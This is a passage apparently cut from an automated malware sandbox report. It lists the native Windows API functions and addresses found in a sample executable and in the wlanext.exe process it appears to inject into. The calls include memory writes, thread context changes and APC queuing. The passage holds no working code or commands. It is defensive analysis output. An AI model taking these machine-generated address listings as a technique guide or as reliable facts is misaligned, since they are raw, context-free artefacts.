          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_00419DCA NtClose,1_2_00419DCA
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_00419E7A NtAllocateVirtualMemory,1_2_00419E7A
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018199A0 NtCreateSection,LdrInitializeThunk,1_2_018199A0
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_01819910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_01819910
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018198F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_018198F0
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_01819840 NtDelayExecution,LdrInitializeThunk,1_2_01819840
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_01819860 NtQuerySystemInformation,LdrInitializeThunk,1_2_01819860
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_01819A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_01819A00
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_01819A20 NtResumeThread,LdrInitializeThunk,1_2_01819A20
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_01819A50 NtCreateFile,LdrInitializeThunk,1_2_01819A50
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018195D0 NtClose,LdrInitializeThunk,1_2_018195D0
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_01819540 NtReadFile,LdrInitializeThunk,1_2_01819540
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_01819780 NtMapViewOfSection,LdrInitializeThunk,1_2_01819780
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018197A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_018197A0
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_01819710 NtQueryInformationToken,LdrInitializeThunk,1_2_01819710
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018196E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_018196E0
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_01819660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_01819660
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018199D0 NtCreateProcessEx,1_2_018199D0
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_01819950 NtQueueApcThread,1_2_01819950
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018198A0 NtWriteVirtualMemory,1_2_018198A0
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_01819820 NtEnumerateKey,1_2_01819820
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_0181B040 NtSuspendThread,1_2_0181B040
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_0181A3B0 NtGetContextThread,1_2_0181A3B0
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_01819B00 NtSetValueKey,1_2_01819B00
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_01819A80 NtOpenDirectoryObject,1_2_01819A80
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_01819A10 NtQuerySection,1_2_01819A10
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018195F0 NtQueryInformationFile,1_2_018195F0
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_01819520 NtWaitForSingleObject,1_2_01819520
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_0181AD30 NtSetContextThread,1_2_0181AD30
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_01819560 NtWriteFile,1_2_01819560
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_01819FE0 NtCreateMutant,1_2_01819FE0
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_0181A710 NtOpenProcessToken,1_2_0181A710
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_01819730 NtQueryVirtualMemory,1_2_01819730
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_01819760 NtOpenProcess,1_2_01819760
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_0181A770 NtOpenThread,1_2_0181A770
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_01819770 NtSetInformationFile,1_2_01819770
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018196D0 NtCreateKey,1_2_018196D0
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_01819610 NtEnumerateValueKey,1_2_01819610
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_01819650 NtQueryValueKey,1_2_01819650
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_01819670 NtQueryInformationProcess,1_2_01819670
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03629B00 NtSetValueKey,LdrInitializeThunk,3_2_03629B00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03629A50 NtCreateFile,LdrInitializeThunk,3_2_03629A50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03629910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_03629910
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_036299A0 NtCreateSection,LdrInitializeThunk,3_2_036299A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03629860 NtQuerySystemInformation,LdrInitializeThunk,3_2_03629860
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03629840 NtDelayExecution,LdrInitializeThunk,3_2_03629840
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03629770 NtSetInformationFile,LdrInitializeThunk,3_2_03629770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03629710 NtQueryInformationToken,LdrInitializeThunk,3_2_03629710
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03629FE0 NtCreateMutant,LdrInitializeThunk,3_2_03629FE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03629780 NtMapViewOfSection,LdrInitializeThunk,3_2_03629780
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03629660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_03629660
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03629650 NtQueryValueKey,LdrInitializeThunk,3_2_03629650
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03629610 NtEnumerateValueKey,LdrInitializeThunk,3_2_03629610
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_036296E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_036296E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_036296D0 NtCreateKey,LdrInitializeThunk,3_2_036296D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03629560 NtWriteFile,LdrInitializeThunk,3_2_03629560
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03629540 NtReadFile,LdrInitializeThunk,3_2_03629540
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_036295D0 NtClose,LdrInitializeThunk,3_2_036295D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0362A3B0 NtGetContextThread,3_2_0362A3B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03629A20 NtResumeThread,3_2_03629A20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03629A00 NtProtectVirtualMemory,3_2_03629A00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03629A10 NtQuerySection,3_2_03629A10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03629A80 NtOpenDirectoryObject,3_2_03629A80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03629950 NtQueueApcThread,3_2_03629950
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_036299D0 NtCreateProcessEx,3_2_036299D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0362B040 NtSuspendThread,3_2_0362B040
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03629820 NtEnumerateKey,3_2_03629820
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_036298F0 NtReadVirtualMemory,3_2_036298F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_036298A0 NtWriteVirtualMemory,3_2_036298A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03629760 NtOpenProcess,3_2_03629760
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0362A770 NtOpenThread,3_2_0362A770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03629730 NtQueryVirtualMemory,3_2_03629730
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0362A710 NtOpenProcessToken,3_2_0362A710
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_036297A0 NtUnmapViewOfSection,3_2_036297A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03629670 NtQueryInformationProcess,3_2_03629670
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03629520 NtWaitForSingleObject,3_2_03629520
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0362AD30 NtSetContextThread,3_2_0362AD30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_036295F0 NtQueryInformationFile,3_2_036295F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02FE9E80 NtAllocateVirtualMemory,3_2_02FE9E80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02FE9CA0 NtCreateFile,3_2_02FE9CA0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02FE9DD0 NtClose,3_2_02FE9DD0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02FE9D50 NtReadFile,3_2_02FE9D50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02FE9E7A NtAllocateVirtualMemory,3_2_02FE9E7A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02FE9C9C NtCreateFile,3_2_02FE9C9C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02FE9DCA NtClose,3_2_02FE9DCA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02FE9D4A NtReadFile,3_2_02FE9D4A
          Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_010BAC700_2_010BAC70
          Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_010BD5900_2_010BD590
          Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_04FE39080_2_04FE3908
          Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_05D9C9D00_2_05D9C9D0
          Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_05D95E500_2_05D95E50
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_0041E8241_2_0041E824
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_0040102B1_2_0040102B
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_0041D2BB1_2_0041D2BB
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_00402D871_2_00402D87
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_00409E201_2_00409E20
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_0041CEE31_2_0041CEE3
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_017F41201_2_017F4120
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_017DF9001_2_017DF900
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_017F99BF1_2_017F99BF
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018020A01_2_018020A0
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018A20A81_2_018A20A8
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_017FA8301_2_017FA830
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018A28EC1_2_018A28EC
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018910021_2_01891002
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018AE8241_2_018AE824
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_017EB0901_2_017EB090
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_0180EBB01_2_0180EBB0
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_017FAB401_2_017FAB40
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018903DA1_2_018903DA
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_0180ABD81_2_0180ABD8
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_0189DBD21_2_0189DBD2
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018823E31_2_018823E3
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_017FA3091_2_017FA309
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018A2B281_2_018A2B28
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018A22AE1_2_018A22AE
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_01894AEF1_2_01894AEF
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_0188FA2B1_2_0188FA2B
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018025811_2_01802581
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018A25DD1_2_018A25DD
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_017D0D201_2_017D0D20
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018A2D071_2_018A2D07
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_017ED5E01_2_017ED5E0
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018A1D551_2_018A1D55
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018944961_2_01894496
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_017E841F1_2_017E841F
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_0189D4661_2_0189D466
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018ADFCE1_2_018ADFCE
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018A1FF11_2_018A1FF1
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_017F6E301_2_017F6E30
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018A2EF71_2_018A2EF7
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_0189D6161_2_0189D616
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_036B2B283_2_036B2B28
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_036A03DA3_2_036A03DA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_036ADBD23_2_036ADBD2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0361EBB03_2_0361EBB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0369FA2B3_2_0369FA2B